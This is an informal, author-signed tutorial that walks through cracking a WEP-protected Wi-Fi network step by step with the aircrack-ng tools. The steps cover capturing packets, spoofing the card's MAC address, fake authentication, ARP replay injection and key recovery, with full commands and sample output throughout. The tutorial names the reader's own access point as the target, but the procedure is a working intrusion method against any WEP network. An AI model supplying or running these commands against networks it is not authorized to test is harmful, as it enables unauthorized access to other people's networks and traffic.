Cracking WEP is one of those things i really enjoy doing its not hard infact the avarage user could probly do it using this or another paper

First Lets list all the Tools we will need:

  1. Wireless Card with Packet Injection (this Tutorial is for Atheros Chipset ONLY)
  2. Laptop or Desktop Computer with above Wirelss Device installed
  3. Linux Live CD or USB-bootable Device with Linux on it
  4. Pen and Paper is Recomended
  5. Time atleast 25 minutes

First Boot into your Linux Distro For this Tutorial we will stick with something simple like Backtrack 3 or 4

Once booted up make sure your Wireless Drivers are working and your card is able to connect to the internet

Now that everything is verified and working open up a Konsole
and login as root using the command

su root

it should prompt you for a password enter it and continue
now we need to see if the Aircrack-ng suite is installed or not


simply type airodump-ng

if you get something like not found then you need to install it using apt-get install aircrack-ng
after that finishes you should be ready to start the sniffing Process
if it says something about interface not specified then your good

run airodump-ng -w /tmp/somefile <interface>

this should run airodump
 which lets you see the AP's thier ESSID's and thier BSSID's aswell as other info needed

if you have that pen and paper ready jot down the ESSID and BSSID of your target(should be YOUR AP) also note the channel number the AP is on this is very Important

once you have your Target Picked hit Control + C to end the Program and rerun with more params

airodump-ng -c <channel> --bssid <BSSID aka MAC address> -w <file to write packet capture to> <interface>

now you should only have your target showing
onto the next steps :D
so Control + C to end airodump-ng

now we need to put our card in monitor mode

what this does is puts it into a mode where it listens to ALL packets going through the air as opposed to only packets thats directed towards it

airmon-ng stop <inferface>

you should get something like

Interface      Chipset      Driver

wifi0             Atheros            madwifi-ng
ath0             Atheros             madwifi-ng VAP (parent: wifi0) (VAP destroyed)


now that its down you can optionaly Change your mac address of your card
for spoofing reasons

macchanger -m 00:00:13:37:00:00 <interface>

now bring it back up

airmon-ng start <interface>

Doing this will Create another Interface a Virtual AP if you will

so now we do

airodump-ng -c <channel> --bssid <BSSID aka MAC address> -w <file to write packet capture to> <New Interface>

next we need to open another Konsole and again login as root using su root :D

now were going to start our packet injection :D
But first we need to make sure we can inject

do this by running

aireplay-ng -9  -a <BSSID> <new interface>

-9 does a simple injection test it should yeild the Following results or similar

09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%

the last line is the most important it should be a number above 80%
if its 0 then injection is not working
if its lower then 80% you are too far away from the AP

if everything is working so far for you and you have a high number then next its time to start our attack

our attack consists of 3 steps

  1. Authenticate with our AP
  2. Listen for ARP Packets and Reinject them
  3. sit back and let our packets increase

The Reason we need to Authenticate with the AP is because the access point will ignore everything we send it if we arnt authed

we reinject arps because thier IV's are unique our goal is to get the most number of unique IV's so we can break the encrytion..think of them as random peices of the password 2 equal peices wont help 

First We send FAKE Auth packets to the Target AP

aireplay-ng -1 0 -a <BSSID> -h <your mac> <new interface>
1 means fake authentication
0 means inf

running this should net you something similar to this

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)


next up is the actual Packet injection :D

again open another Konsole login as root

aireplay-ng -3 -b <BSSID> -h <Your MAC> <new Interface>

-3 means ARP Inject

your results should be similair to below

Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...


next open another console login again

and restart our 2nd command

airodump-ng -c <channel> --bssid <BSSID aka MAC address> -w <file to write packet capture to> <New Interface>

after this you should note the DATA number should be increaseing fairly quickly

and thats it really let it run for about 10-16 minutes the more DATA you have the faster you can crack the WEP key

20,000 packets for 64-bit

40,000 to 85,000 packets for 128 bit

after you reach that point go ahead and Control + C on all Konsole windows

then type aircrack-ng <file you used to save packets in>

This will bring up the aircrack-ng program select the AP..should only be one and let it crack

you should get something like this

Aircrack-ng 0.9


[00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%



And thats Cracking WEP by Mouseroot